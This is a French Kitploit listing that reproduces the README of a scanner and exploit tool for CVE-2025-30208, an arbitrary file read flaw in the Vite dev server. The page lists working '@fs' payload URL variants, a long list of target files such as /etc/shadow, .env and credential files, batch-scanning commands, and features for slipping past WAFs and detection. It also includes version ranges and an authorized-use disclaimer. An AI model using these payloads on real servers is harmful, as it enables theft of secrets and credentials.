Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichier de sévérité moyenne dans le serveur de développement Vite (un outil populaire de construction frontend). | Kitploit
Outils/GitHubGitHub/themehackers/cve-2025-30208
Scanners de VulnérabilitésGénération de PayloadsExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichier de sévérité moyenne dans le serveur de développement Vite (un outil populaire de construction frontend).

Voir le dépôt
107il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Scanner de vulnérabilité de lecture arbitraire de fichier Vite CVE-2025-30208

Python License Security Status Modular

Scanner de vulnérabilité avancé pour CVE-2025-30208 avec des fonctionnalités de niveau entreprise

Outil de test d'intrusion professionnel pour la détection de la vulnérabilité de lecture arbitraire de fichier Vite

🚀 Démarrage rapide • 📋 Fonctionnalités • 🔧 Utilisation • 📊 Exemples • 🛡️ Sécurité


📖 Aperçu

Ceci est un scanner de vulnérabilité complet conçu pour détecter et exploiter la vulnérabilité CVE-2025-30208 dans les serveurs de développement Vite. Cette vulnérabilité permet un accès en lecture arbitraire de fichiers via les points de terminaison du système de fichiers de Vite, exposant potentiellement des fichiers de configuration sensibles, du code source et des informations système.

🎯 Ce que fait cet outil

  • Détecte les instances Vite vulnérables sur les réseaux
  • Exploite la vulnérabilité de lecture arbitraire de fichier en toute sécurité
  • Découvre les fichiers sensibles et les données de configuration
  • Rapporte les résultats dans plusieurs formats (HTML, JSON, Console)
  • Gère les sessions de scan et les configurations
  • Gère les erreurs avec élégance grâce à des mécanismes de réessai automatique

🏗️ Architecture modulaire

L'outil dispose désormais d'une architecture modulaire pour une meilleure maintenabilité et extensibilité :

  • CVE-2025-30208.py - Application de scan principale
  • payloads.py - Charges utiles d'exploitation avancées (60+ variations)
  • sensitive_files.py - Base de données complète de fichiers sensibles (200+ fichiers)
  • html_template.py - Modèle de rapport HTML amélioré style hacker

🚀 Démarrage rapide

Prérequis

root@kitploit:~
pip3 install -r requirements.txt

Utilisation de base

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Fonctionnalités

🔍 Détection de vulnérabilité principale

  • 60+ charges utiles avancées : techniques d'exploitation complètes pour une détection maximale
  • Détection intelligente : analyse intelligente des réponses pour éviter les faux positifs
  • Validation en temps réel : validation continue des réponses cibles
  • Tests complets : teste tous les points de terminaison vulnérables connus

🛡️ Fonctionnalités de sécurité améliorées

  • Support proxy : configuration proxy HTTP/HTTPS pour l'anonymat
  • En-têtes personnalisés : contourner WAF/IPS avec des en-têtes HTTP personnalisés
  • Limitation de débit : délais configurables pour éviter la détection
  • Gestion de session : sauvegarder et restaurer les sessions de scan
  • Validation d'entrée : validation complète des paramètres

🔧 Capacités avancées

  • Scan par lots : scan multi-thread de plusieurs cibles
  • Découverte de fichiers sensibles : découverte automatisée de plus de 200 fichiers sensibles
  • Test de connectivité : test des protocoles TCP/UDP/HTTP/HTTPS
  • Récupération d'erreur : réessai automatique avec backoff exponentiel
  • Journalisation complète : journaux détaillés avec horodatage

📊 Rapports et sortie

  • 🎨 Rapports HTML améliorés : superbes rapports de vulnérabilité style hacker avec animations
  • Export JSON : données structurées pour une analyse ultérieure
  • Sortie console : retour en temps réel avec codes couleur
  • Fichiers journaux : pistes d'audit détaillées
  • Interface Web interactive : serveur Web intégré pour visualiser les rapports

🔧 Guide d'utilisation

1. Configuration de base

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test de vulnérabilité

root@kitploit:~
CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scan par lots

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Découverte de fichiers sensibles

root@kitploit:~
CVE-2025-30208 > scan

5. Configuration avancée

root@kitploit:~
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Rapports HTML améliorés

root@kitploit:~
# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Référence des commandes

CommandeDescriptionExemple
set <option> <value>Définir les options de configurationset RHOST 192.168.1.100
show optionsAfficher les paramètres actuelsshow options
editÉditeur interactif d'optionsedit
run / exploitLancer le test de vulnérabilitérun
batchScanner plusieurs cibles par lotsbatch
scanDécouvrir les fichiers sensiblesscan
pullExporter les résultats en HTML/JSONpull
web [on|off|port]Serveur Web pour les rapports HTMLweb 8080
saveSauvegarder la configuration de sessionsave
loadCharger la configuration de sessionload
testTester la connectivité vers la cibletest
validateValider la configuration actuellevalidate
verboseActiver/désactiver le mode verbeuxverbose
proxyConfigurer les paramètres proxyproxy
headersDéfinir des en-têtes HTTP personnalisésheaders
rateConfigurer la limitation de débitrate

⚙️ Options de configuration

OptionDescriptionDéfautValidation
RHOSTAdresse hôte/IP cible-Validation nom d'hôte/IP
RPORTNuméro de port cible-Plage de ports (1-65535)
FILEPATHChemin du fichier à testeretc/passwdValidation du chemin
PROXYURL du proxy HTTP/HTTPS-Validation du format URL
VERBOSEActiver la sortie verbeusefalseValidation booléenne
RATE_LIMITDélai entre les requêtes (secondes)0.3Validation numérique
THREADSNombre de threads pour le scan par lots5Validation entière
TIMEOUTDélai d'attente de requête (secondes)5Validation entière
CUSTOM_HEADERSEn-têtes HTTP personnalisés (JSON){}Validation du format JSON

🎨 Système de charges utiles amélioré

Le scanner utilise désormais plus de 60 variations de charges utiles organisées dans payloads.py :

Charges utiles @fs principales

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Variations de paramètres étendus

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Variations spécifiques à Vite

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Variations du système de modules

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Points de terminaison alternatifs

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Découverte améliorée de fichiers sensibles

L'outil teste désormais plus de 200 fichiers sensibles organisés dans sensitive_files.py :

🖥️ Fichiers système (Linux/Unix)

  • /etc/passwd - Informations des comptes utilisateurs
  • /etc/shadow - Données de mots de passe chiffrés
  • /etc/services - Services réseau
  • /etc/hosts - Mappages de noms d'hôtes
  • /etc/fstab - Table des systèmes de fichiers
  • /etc/ssh/sshd_config - Configuration du serveur SSH
  • /etc/crontab - Tâches cron système
  • /etc/sudoers - Configuration sudo

📊 Informations sur les processus

  • /proc/version - Version du noyau
  • /proc/cpuinfo - Informations CPU
  • /proc/meminfo - Informations mémoire
  • /proc/self/environ - Environnement du processus
  • /proc/self/cmdline - Ligne de commande du processus
  • /proc/net/tcp - Connexions TCP
  • /proc/net/udp - Connexions UDP

⚙️ Configuration d'application

  • .env - Variables d'environnement
  • .env.local - Environnement local
  • .env.production - Environnement de production
  • config.json - Configuration de l'application
  • settings.json - Paramètres de l'application
  • application.properties - Configuration Spring
  • application.yml - Configuration YAML
  • database.yml - Configuration de la base de données
  • secrets.json - Gestion des secrets

📦 Fichiers Node.js / JavaScript

  • package.json - Dépendances Node.js
  • package-lock.json - Dépendances verrouillées
  • yarn.lock - Fichier de verrouillage Yarn
  • vite.config.js - Configuration Vite
  • vite.config.ts - Configuration Vite TypeScript
  • tsconfig.json - Configuration TypeScript
  • webpack.config.js - Configuration Webpack
  • next.config.js - Configuration Next.js
  • nuxt.config.js - Configuration Nuxt.js
  • angular.json - Configuration Angular
  • vue.config.js - Configuration Vue.js
  • rollup.config.js - Configuration Rollup
  • eslint.config.js - Configuration ESLint
  • prettier.config.js - Configuration Prettier
  • jest.config.js - Configuration Jest
  • babel.config.js - Configuration Babel
  • tailwind.config.js - Configuration Tailwind CSS

🔧 Fichiers Git

  • .git/config - Configuration Git
  • .gitignore - Règles d'ignorance Git
  • .gitattributes - Attributs Git
  • .gitmodules - Sous-modules Git
  • .git/HEAD - Branche actuelle
  • .git/logs/HEAD - Journaux Git
  • .git/refs/heads/master - Branche master
  • .git/refs/heads/main - Branche principale

📚 Fichiers de documentation

  • README.md - Documentation du projet
  • CHANGELOG.md - Journal des modifications
  • LICENSE - Informations de licence
  • CONTRIBUTING.md - Directives de contribution
  • AUTHORS - Informations sur les auteurs
  • TODO.md - Liste de tâches
  • ROADMAP.md - Feuille de route de développement

🐳 Fichiers Docker

  • Dockerfile - Configuration Docker
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - Configuration de remplacement
  • .dockerignore - Règles d'ignorance Docker
  • docker-compose.prod.yml - Configuration de production
  • docker-compose.dev.yml - Configuration de développement

🌐 Configuration du serveur Web

  • nginx.conf - Configuration Nginx
  • apache2.conf - Configuration Apache
  • httpd.conf - Configuration du démon HTTP
  • .htaccess - Contrôle d'accès Apache
  • web.config - Configuration IIS
  • robots.txt - Directives pour les moteurs de recherche
  • sitemap.xml - Structure du site
  • manifest.json - Manifeste d'application Web
  • sw.js - Service worker
  • firebase.json - Configuration Firebase
  • firebase.rules - Règles de sécurité Firebase

🪟 Fichiers Windows

  • boot.ini - Configuration de démarrage
  • autoexec.bat - Script d'exécution automatique
  • system.ini - Configuration système
  • win.ini - Configuration Windows
  • Users - Répertoires utilisateurs
  • Windows - Fichiers système
  • Program Files - Répertoires d'applications

🍎 Fichiers macOS

  • System - Fichiers système
  • Library - Fichiers de bibliothèque
  • Applications - Fichiers d'applications
  • private/etc/hosts - Fichier hosts
  • private/etc/passwd - Comptes utilisateurs

🗄️ Fichiers de base de données

  • database.db - Base de données SQLite
  • database.sqlite - Base de données SQLite
  • data.db - Base de données de données
  • dump.sql - Vidage de base de données
  • schema.sql - Schéma de base de données
  • migrations - Migrations de base de données

📝 Fichiers journaux

  • logs - Répertoire des journaux
  • error.log - Journaux d'erreurs
  • access.log - Journaux d'accès
  • app.log - Journaux d'application
  • debug.log - Journaux de débogage
  • combined.log - Journaux combinés

💾 Fichiers de sauvegarde

  • backup - Répertoire de sauvegarde
  • backup.sql - Sauvegarde de base de données
  • backup.zip - Sauvegarde compressée
  • dump - Vidage de données
  • export - Exportation de données

🔒 Sécurité et authentification

  • auth.json - Configuration d'authentification
  • credentials.json - Stockage d'identifiants
  • keys.json - Gestion des clés
  • tokens.json - Stockage de jetons
  • jwt.json - Configuration JWT
  • oauth.json - Configuration OAuth

🔌 Fichiers API et services

  • api.json - Configuration API
  • swagger.json - Documentation API
  • openapi.json - Spécification OpenAPI
  • graphql.json - Configuration GraphQL
  • schema.json - Schéma API

☁️ Fichiers cloud et déploiement

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Configuration Serverless
  • terraform.tf - Configuration Terraform
  • kubernetes.yml - Configuration Kubernetes
  • k8s.yml - Configuration Kubernetes

📊 Surveillance et analytique

  • analytics.json - Configuration analytique
  • monitoring.json - Configuration de surveillance
  • metrics.json - Configuration des métriques
  • telemetry.json - Données de télémétrie

🎨 Rapports HTML améliorés

L'outil génère désormais de superbes rapports HTML style hacker avec :

✨ Fonctionnalités visuelles

  • Fond style Matrix avec des caractères animés tombant
  • Animations de dégradé et effets lumineux
  • Éléments interactifs avec effets de survol
  • Design responsive pour tous les appareils
  • Thème sombre optimisé pour les professionnels de la sécurité

📊 Statistiques interactives

  • Compteurs en temps réel pour les fuites totales et les octets exposés
  • Indicateurs de gravité avec code couleur
  • Fonctionnalité de copie pour chaque fuite
  • Aperçu du contenu avec taille et nombre de lignes
  • Sections extensibles pour une analyse détaillée

🔧 Fonctionnalités techniques

  • Intégration Google Fonts (JetBrains Mono, Orbitron)
  • Animations CSS et transitions
  • Interactivité JavaScript pour une UX améliorée
  • Design responsive mobile
  • Compatibilité multi-navigateurs

🌐 Intégration du serveur Web

  • Serveur HTTP intégré pour visualiser les rapports
  • Ouverture automatique du navigateur
  • Options de configuration de port
  • Commandes faciles de démarrage/arrêt

🛡️ Gestion des erreurs et récupération

Mécanisme de réessai automatique

  • 3 tentatives de réessai : les requêtes échouées sont automatiquement réessayées
  • Backoff exponentiel : délais croissants entre les tentatives
  • Classification intelligente des erreurs : gestion différenciée selon les types d'erreurs
  • Récupération gracieuse : l'outil continue de fonctionner après les erreurs

Catégories d'erreurs

  • NetworkError : problèmes de connexion, délai d'attente, proxy
  • ConfigurationError : paramètres et réglages invalides
  • ValidationError : paramètres d'entrée invalides
  • ScannerError : erreurs générales du scanner

Fonctionnalités de validation

  • Validation d'entrée en temps réel : tous les paramètres validés avant utilisation
  • Validation de configuration : validation complète avant le scan
  • Test de connectivité : test des protocoles TCP/UDP/HTTP/HTTPS
  • Validation du proxy : validation du format d'URL du proxy

📁 Fichiers de sortie

FichierDescriptionFormat
data_leak.htmlRapport de vulnérabilité HTML amélioré style hackerHTML
data_leak.jsonExport JSON structuréJSON
sensitive_files_discovery.jsonFichiers sensibles découvertsJSON
session.jsonConfiguration de session sauvegardéeJSON
logs/cve_2025_30208_YYYYMMDD_HHMMSS.logJournaux d'audit détaillésTexte

📝 Versions affectées

🚨 Versions vulnérables

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Versions non affectées

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Sécurité et utilisation éthique

⚠️ Notes importantes sur la sécurité

  • Tests autorisés uniquement : utilisez uniquement sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite
  • Divulgation responsable : signalez les vulnérabilités aux propriétaires des systèmes
  • Limitation de débit : utilisez des délais appropriés pour éviter de submerger les cibles
  • Utilisation du proxy : envisagez d'utiliser des proxys pour l'anonymat lorsque cela est approprié
  • Conformité légale : assurez-vous du respect des lois et réglementations locales

🔒 Bonnes pratiques

  • Obtenez toujours une autorisation écrite avant de tester
  • Utilisez uniquement dans des environnements contrôlés
  • Documentez toutes les activités de test
  • Respectez les limites de débit et les ressources système
  • Signalez les résultats de manière responsable

🚀 Exemples d'utilisation avancée

Exemple 1 : Scan réseau complet

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Exemple 2 : Scan furtif avec proxy

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Exemple 3 : Flux de travail de rapport amélioré

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Exemple 4 : Découverte de fichiers sensibles

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Structure du projet

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Application de scan principale
├── payloads.py                # Charges utiles d'exploitation avancées (60+)
├── sensitive_files.py         # Base de données de fichiers sensibles (200+)
├── html_template.py           # Modèle de rapport HTML amélioré
├── README.md                  # Cette documentation
├── requirements.txt           # Dépendances Python
├── logs/                      # Répertoire des fichiers journaux
├── data_leak.html            # Rapports HTML générés
├── data_leak.json            # Rapports JSON générés
└── session.json              # Configurations de session sauvegardées

🤝 Contribuer

Nous accueillons les contributions pour améliorer cet outil :

  1. Fork le dépôt
  2. Créez une branche de fonctionnalité
  3. Effectuez vos modifications
  4. Testez minutieusement
  5. Soumettez une pull request

Domaines de contribution

  • Nouvelles variations de charges utiles dans payloads.py
  • Motifs supplémentaires de fichiers sensibles dans sensitive_files.py
  • Modèles HTML améliorés dans html_template.py
  • Gestion des erreurs améliorée
  • Optimisations de performances
  • Améliorations de la documentation

📄 Licence

Ce projet est sous licence à des fins éducatives et de tests de sécurité autorisés uniquement.

⚠️ Avertissement légal : Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins de recherche. Les utilisateurs sont responsables de s'assurer qu'ils disposent des autorisations appropriées avant de tester un système. Les auteurs ne sont pas responsables de toute utilisation abusive de cet outil.


👨‍💻 Auteur

ThemeHackers

GitHub

Chercheur en sécurité & Testeur d'intrusion


⭐ Si cet outil vous a aidé, veuillez lui donner une étoile ! ⭐

Construit avec ❤️ pour la communauté de la sécurité

Télécharger l’outil
log
Afficher les informations de journal
log
help / ?Afficher l'aidehelp
exit / quitQuitter l'outilexit